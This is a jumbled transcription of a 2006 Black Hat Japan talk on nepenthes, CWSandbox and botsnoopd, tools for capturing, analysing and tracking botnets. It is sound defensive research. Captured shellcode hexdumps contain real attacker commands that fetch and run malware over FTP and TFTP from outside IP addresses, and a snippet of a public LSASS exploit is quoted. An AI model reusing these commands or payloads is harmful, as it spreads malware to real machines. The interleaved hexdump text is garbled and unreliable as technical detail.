Detecting, Tracking, and Mitigating Botnets
Transcription
Detecting, Tracking, and Mitigating Botnets
Catching Malware Detecting, Tracking, and Mitigating Botnets Pi1 - Laboratory for Dependable Distributed Systems http://mwcollect.org Outline • Motivation • Tools & techniques to learn more about botnets • nepenthes • CWSandbox • botsnoopd • Results Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Motivation • Botnet monitoring • Find new botnets independently • Bots spread like worms • Observe infection and analyze bot to obtain Command and Control (C&C) information Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Botnet Typical communication flow using central (IRC) server for Command & Control (C&C) Attacker Bot Bot C&C Server 5 3 1 m o dc n a c s $adv b 0 5 200 IRC Bot hax0r.example.com 3267/TCP http://honeynet.org/papers/bots Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Collecting Malware Automatically Downloading Malware Binaries nepenthes • Tool to automatically “collect” malware like bots and other autonomous spreading malware • Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities • Available at http://nepenthes.mwcollect.org Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Architecture • Modular architecture • Vulnerability modules • Shellcode handler • Download modules • Submission modules • Trigger events • Shell-emulation and virtual filesystem Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Schematic overview Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Vulnerability modules • Emulate vulnerable services • Play with exploits until they send us their payload (finite state machine) • Currently more than 20 available vulnerability modules • More in development • Analysis of known vulnerabilities & exploits necessary • Automation possible? Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Example • Emulation of MS04-011 (LSASS) • Proof-of-Concept exploit from houseofdabus: if (send(sockfd, req2, sizeof(req1)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); if (send(sockfd, req3, sizeof(req2)-1, 0) == -1) { printf("[-] Send failed\n"); exit(1); } len = recv(sockfd, recvbuf, 1600, 0); Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Example • Answers from vuln-lsass (taken from mwcollectd) case RPCS_GOT_LSASS_STAGE3: case RPCS_GOT_LSASS_STAGE4: case RPCS_GOT_LSASS_STAGE5: { unsigned char szBuffer[256]; for (unsigned int i = 0; i < sizeof(szBuffer); ++i) szBuffer[i] = rand() % 0xFF; m_pCollector->getNetworkInterface()-> sendData(iHandle, szBuffer, sizeof(szBuffer)); m_dsState = (rpc_state_t) ((unsigned int) m_dsState + 1); } Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Vulnerability modules • vuln-dcom (MS03-039) • vuln-lsass (MS04-011) • vuln-asn1 (MS04-007) • vuln-wins (MS04-045) • vuln-{mssql,msdtc,msmq} • vuln-{optix,kuang2,bagle,mydoom} • vuln-veritas • ... Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Shellcode modules • Automatically extract URL used by malware to transfer itself to compromised machine • sch_generic_xor • Generic XOR decoder • sch_generic_createprocess • sch_generic_url • sch_generic_cmd Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [...] [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia [ dia ] ] ] ] ] ] ] ] =------------------[ hexdump(0x1bf7bb68 , 0x0000 00 00 10 bf ff 53 4d 42 73 00 00 0x0010 00 00 00 00 00 00 00 00 00 00 00 0x0020 00 00 00 00 0c ff 00 00 00 04 11 0x0030 00 00 00 7e 10 00 00 00 00 d4 00 0x0040 82 10 7a 06 06 2b 06 01 05 05 02 0x0050 82 10 6a a1 82 10 66 23 82 10 62 0x0060 41 41 41 41 41 41 41 41 41 41 41 ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] ] 0x0450 0x0460 0x0470 0x0480 0x0490 0x04a0 0x04b0 0x04c0 0x04d0 0x04e0 0x04f0 0x0500 0x0510 0x0520 0x0530 0x0540 0x0550 0x0560 0x0570 0x0580 0x0590 0x05a0 0x05b0 0x000010c3) 00 00 18 07 00 00 00 37 0a 00 00 00 00 80 7e 10 a0 82 10 6e 03 82 04 01 41 41 41 41 cmd 41 41 /c 41 41 41 41 41 41 41 41 41 41 41 03 echo 00 23 82 open 0c 57 03 82 04 0a 00 90 42 84.178.54.239 42 90 42 81 c4 54 f2 ff ff fc e8 46 00 a ef a 8b 4f 18 8b 5f 45 echo 3c 8b 7c user 05 78 01 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c1 ca 0d 01 c2 eb f4 3b 54 24 04 75 e3 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 89 echo 5c 24 04 bye c3 31 c0 64 8b 40 30 85 c0 40 0c 8b 70 1c ad 8b 68 08 e9 0b 00 00 34 05 7c 00 00 00 8b 68 3c 5f 31 f6 60 68 ef -n ce e0-v 60 -s:ii 68 98 fe & 8a 0e 57 ff e7 ftp ff ff 63 6d 64 20 2f 63 20 65 63 68 6f del ii & 65 6e 20 38 34 2e 31 37 38 2e 35 34 2e 20 svchosts.exe 36 32 30 31 20 3e 3e 20 69 69 20 26 6f 20 75 73 65 72 20 61 20 61 20 3e 3e 20 26 65 63 68 6f 20 62 69 6e 61 72 79 20 69 69 20 26 65 63 68 6f 20 67 65 74 63 68 6f 73 74 73 2e 65 78 65 20 3e 3e 20 26 65 63 68 6f 20 62 79 65 20 3e 3e 20 26 66 74 70 20 2d 6e 20 2d 76 20 2d 69 20 26 64 65 6c 20 69 69 20 26 73 76 73 74 73 2e 65 78 65 0d 0a 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 41 41 90>> 42 00 00 20>> 01 c0>> 74 8b 5f 8b>> 01 78>> 0f 00 8b 56 eb e8 ee 20 6f 32 33 65 63 20 69 20 3e 20 73 20 69 20 69 73 3a 63 68 42 42 42 42 ]-------------------= c8 .....SMB s....... 13 ........ ......7. 00 ........ ........ 60 ...~.... .....~.` 30 ..z..+.. ......n0 00 ..j...f# ..b..... 41 AAAAAAAA AAAAAAAA 41 90 ii 8b ii eb 07 ii 24 ii eb 8b ii 40 0d ff 70 39 68 69 3e 76 69 69 69 6f 42 42 AAAAAAAA ..#..W.. & B.B..T.. & E<.|.x.. ..I.4... & .......; & ..f..K._ .\$..1.d & @..p...h 4.|....h h...`h.. ..cmd /c en 84.17 6201 >> o user a &echo b ii &ech chosts.e &echo b &ftp -n i &del i sts.exe. BBBBBBBB ftp://a:a@84.178.54.239/svchosts.exe AAAAAAAA ....B.B. ...F.... .O.._ .. 1.....t. T$.u.._$ ........ .@0..x.. .......@ <_1.`V.. ..W..... echo op 8.54.239 ii &ech a >> ii inary >> o get sv xe >> ii ye >> ii -v -s:i i &svcho ..BBBBBB BBBBBBBB dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] ...] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] dia] =------------------[ hexdump(0x1c1b6210 , 0x0000 47 45 54 20 2f 20 48 54 54 50 2f 0x0010 48 6f 73 74 3a XX XX XX XX XX XX 0x0020 XX XX XX XX 0d 0a 41 75 74 68 6f 0x0030 69 6f 6e 3a 20 4e 65 67 6f 74 69 0x0040 49 49 51 65 67 59 47 4b 77 59 42 0x0050 49 49 51 62 6a 43 43 45 47 71 68 0x0060 34 49 51 59 67 4f 43 42 41 45 41 0x0070 55 46 42 51 55 46 42 51 55 46 42 0x0080 55 46 42 51 55 46 42 51 55 46 42 0x00000800) 31 2e 30 0d XX XX XX XX 72 69 7a 61 61 74 65 20 42 51 55 43 67 68 42 6d 51 55 46 42 51 55 46 42 51 55 46 42 ]-------------------= 0a GET / HT TP/1.0.. XX Host: XX XXXXXXXX 74 XXXX..Au thorizat 59 ion: Neg otiate Y 6f IIQegYGK wYBBQUCo 49 IIQbjCCE GqhghBmI 51 4IQYgOCB AEAQUFBQ 51 UFBQUFBQ UFBQUFBQ 51 UFBQUFBQ UFBQUFBQ 0x05b0 0x05c0 0x05d0 0x05e0 0x05f0 0x0600 0x0610 0x0620 0x0630 0x0640 0x0650 0x0660 0x0670 0x0680 0x0690 0x06a0 0x06b0 0x06c0 0x06d0 0x06e0 0x06f0 0x0700 51 42 78 52 58 4d 77 41 48 69 48 4e 59 69 5a 49 4c 63 63 65 51 51 51 6b 2f 66 36 72 4f 69 36 68 61 41 44 2f 59 4e 4e 65 64 5a 51 51 55 51 45 2f 41 2b 49 31 77 34 63 41 41 57 2b 79 43 79 53 32 58 6b 46 4d 4b 2f 56 4d 54 51 78 6c 42 6a 41 6a 66 42 34 42 35 4e 68 4a 42 41 51 38 34 75 41 6b 4c 63 34 70 41 76 6f 30 78 48 6c 75 70 43 51 49 51 36 41 53 64 42 69 4a 44 43 69 7a 37 5a 4e 52 65 63 64 51 55 34 70 45 65 59 41 48 31 41 34 77 32 75 76 6e 6a 56 47 32 41 6b 46 49 42 59 2b 73 66 58 38 54 74 41 67 42 2f 52 6b 51 55 5a 42 4a 42 4d 43 41 4c 30 42 6a 63 44 41 41 38 67 2f 77 75 67 6d 30 43 43 51 56 6b 41 54 69 79 69 41 4d 44 41 58 61 2f 49 4d 64 63 65 51 51 55 77 45 41 78 77 67 31 65 63 49 49 7a 4a 32 43 54 32 33 53 6b 6b 46 4f 4b 43 69 48 30 38 75 42 74 74 48 6a 4e 31 63 4e 52 35 4a 4a 42 43 42 4c 4c 75 42 6b 4c 6b 77 41 32 2b 74 70 31 75 68 6c 43 43 55 41 46 54 79 63 75 65 49 30 4b 41 46 67 43 44 6a 32 6e 47 6b 6b 46 6f 54 79 41 43 76 74 73 41 32 56 62 35 41 45 45 5a 51 55 4a 4a 42 41 79 4c 42 5a 30 6d 42 77 4c 38 72 58 76 7a 32 30 67 6d 43 43 UFBQUFBQ QMAI4IMV EKQQpBCk //86EYAA AV4Ae+LT +MuSYs0i ITAdAfBy 1QkBHXji wxLi18cA 4lcJATDM cB4D4tAD AjpCwAAA AAAi2g8X WjvzuBga +fo7v/// yB0ZnRwI C4xNjkuM yBHRVQgd S5leGUmc 2Nuc2Z0e XhpdABCQ kJCQkJCQ UFBQUFBQ wOCBAoAk EKBxFTy/ ACLRTyLf xiLXyAB6 wHuMcCZr g0Bwuv0O 18kAetmi euLHIsB6 cBki0Awh ItwHK2La ItANAV8A zH2YFbrD Jj+ig5X/ 2NtZCAvY C1pIDEzN Tc1LjE2N 2Nuc2Z0e 3RhcnQgd S5leGUmZ kJCQkJCQ kJCQkJCQ cat asn1-iis.txt | cut -b 83- | sed "s/ //g" > asn1-iis.dec mimencode -u asn1-iis.dec | hexdump -C 00000000 00000010 00000020 00000030 * 00000420 00000430 00000440 00000450 00000460 00000470 00000480 00000490 000004a0 000004b0 000004c0 000004d0 000004e0 000004f0 00000500 00000510 * 000005d0 60 30 00 41 82 82 41 41 10 10 41 41 7a 6a 41 41 06 a1 41 41 06 82 41 41 2b 10 41 41 06 66 41 41 01 23 41 41 05 82 41 41 05 10 41 41 41 03 00 23 82 0c 57 03 82 04 0a 90 42 90 42 81 c4 54 f2 ff ff fc 8bcmd 45 3c /c8b 7c 05 78 01 ef 8b 4f eb e3 2e 49-i8b134.169.175.167 34 8b 01 ee 31 c0 tftp 07 c1 ca 0d 01 c2 eb f4 3b 54 24 start wcnsfty.exe & 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 ebexit 89 5c 24 04 c3 31 c0 64 8b 40 8b 40 0c 8b 70 1c ad 8b 68 08 e9 40 34 05 7c 00 00 00 8b 68 3c 5f 0d 68 ef ce e0 60 68 98 fe 8a 0e ff ff ff 63 6d 64 20 2f 63 20 74 69 20 31 33 34 2e 31 36 39 2e 31 37 20 47 45 54 20 77 63 6e 73 66 65 26 73 74 61 72 74 20 77 63 6e 65 78 65 26 65 78 69 74 00 42 42 42 42 42 42 42 42 42 42 42 42 42 02 62 41 41 a0 03 41 41 82 82 41 41 10 04 41 41 6e 01 41 41 |`..z..+..... ..n| |0..j¡..f#..b....| |.AAAAAAAAAAAAAAA| |AAAAAAAAAAAAAAAA| 00 90 42 90 42 |A..#..W......B.B| e8 46 00 00 00 |.B.B.ÄTòÿÿüèF...| 18 8b 5f 20 01 |.E<.|.x.ï.O.._ .| 99 acwcnsfty.exe 84 c0 74 |ëã.I.4..î1À.¬.Àt| GET & 04 75 e3 8b 5f |.ÁÊ..Âëô;T$.uã._| eb 8b 1c 8b 01 |$.ëf..K._..ë....| 30 85 c0 78 0f |ë.\$.Ã1Àd.@0.Àx.| 0b 00 00 00 8b |.@..p..h.é.....| 31 f6 60 56 eb |@4.|....h<_1ö`Vë| 57 ff e7 e8 ee |.hïÎà`h.þ..Wÿçèî| 66 74 70 20 2d |ÿÿÿcmd /c tftp -| 37 35 2e 31 36 |i 134.169.175.16| 74 79 2e 65 78 |7 GET wcnsfty.ex| 73 66 74 79 2e |e&start wcnsfty.| 42 42 42 42 42 |exe&exit.BBBBBBB| 42 42 42 42 42 |BBBBBBBBBBBBBBBB| tftp://134.169.175.167/wcnsfty.exe Download modules • download-{http,tftp} • Handles HTTP / TFTP URIs • download-ftp • FTP client from Windows is not RFC compliant... • download-{csend,creceive} • download-link • link://10.0.0.1/HJ4G== Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Submission modules • submit-file • Write file to hard disk • submit-{mysql,postgres,mssql} • Store file in database • submit-norman • Submit file to http://sandbox.norman.no • submit-gotek • Send file via G.O.T.E.K. Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org nepenthes-Demo Thorsten Holz • Laboratory for Dependable Distributed Systems UNIVERSITÄT MANNHEIM mwcollect Alliance https://alliance.mwcollect.org Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Statistics: nepenthes • Four months nepenthes on /18 network: • 50,000,000+ files downloaded • 14,000+ unique binaries based on md5sum • ~1,000 different botnets • Anti-virus engines detect between 70% and 90% of the binaries • Korgobot/Padobot dominates Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org CWSandbox Automatically Analyzing a Collected binary Overview • Automatic behaviour analysis • Execute the binary and observe what it is doing • Similar to Norman Sandbox • http://sandbox.norman.no • Part of diploma thesis by Carsten Willems • Currently stable beta version available • Results look promising http://www.cwsandbox.org Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Windows API Basics • Schematic Overview of Windows API Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Example r more details about what is going on in NTOSKRNL.EXE. Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org DLL kernel32. For better understanding the instructions are logically split into ks. Of course this is only done in the figure and has no semantics in the rea first block marks the instructions, that will be overwritten by the JMP to our h tion. The second block includes the instructions, that will be untouched by the k. API hooking by Inline Code Overwriting he lower port of the figure you can see what happens, when the hook is installe Example • Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Inner working • API hooking, Code Overwriting, and DLL injection • Hooking of Win32 and Native API calls • Tracing of functions for file access, process access, Winsock communication, registry, ... • Execution for three minutes, then processing of results ➙ analysis log in XML format Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Schematic overview • CWSandbox & CWMonitor.dll Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org CWSandbox-Demo Thorsten Holz • Laboratory for Dependable Distributed Systems UNIVERSITÄT MANNHEIM Tracking Botnets Observing a Botnet Tracking Botnets • Botnets can not impose authentication that is not also encoded in the bot’s binary • Usually, commands are flooded to all bots and not selectively to specific bots • Most botnets are usually so large that not all bots are expected to respond to commands in time ➭ We can effectively subvert botnets by joining it with our own snoop clients, without being detected Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Bot Impersonification • Run bot binary on honeypot, observe from outside • Better: Use existing software for control protocol • For IRC-based botnets: irssi, mIRC, xchat, ... • Even better: Implement generic bot emulation client • botsnoopd Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org botsnoopd • Daemon dedicated to snoop different kinds of botnets • Not limited to IRC, but also HTTP and others • Modular design, extensible via plugins • Uses libnetworkd for performance • Scales to at least 100 botnets on single machine • Will be released under GPL Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Schematic Overview emulate−genirc proxy−socks4 proxy−http client−irc emulate−rbot client−http react−snortsam client−nugache react−asnmail log−irc log−postgres log−file Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Botnet-Demo Thorsten Holz • Laboratory for Dependable Distributed Systems UNIVERSITÄT MANNHEIM Botnet Mitigation How to Stop Botnets? Mitigation • Change DNS entry • hax0r.example.org should resolve to 127.0.0.1 • Block traffic at router • All access to C&C IP should be monitored • Take down C&C-Server • Often cooperation needed Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Conclusion • Honeypot-based techniques can help us to learn more about autonomous spreading malware • With the help of automated capture and analysis, we can efficiently detect botnets • Local and global mitigation possible • Needs more research, e.g., 0day-support • More nepenthes sensors would be helpful ;-) Holz & Wicherski • Black Hat Japan 2006: Catching Malware http://mwcollect.org Thorsten Holz Georg Wicherski http://www-pi1.informatik.uni-mannheim.de/ thorsten.holz@gmail.com http://pixel-house.net georg-wicherski@pixel-house.net More information: http://mwcollect.org & http://honeyblog.org Pi1 - Laboratory for Dependable Distributed Systems http://mwcollect.org
Similar documents
DAY 1 - Thorsten Hol.. - Hack In The Box Security Conference
RBOT|JPN|XP-SP0-51673> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 59.87.205.37. RBOT|USA|XP-SP1-29968> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| ...
More informationFull Disclosure Report
Multiple transactions are used to simulate the business activity of processing an order, and each transaction is subject to a response time constraint. The performance metric for this benchmark is ...
More information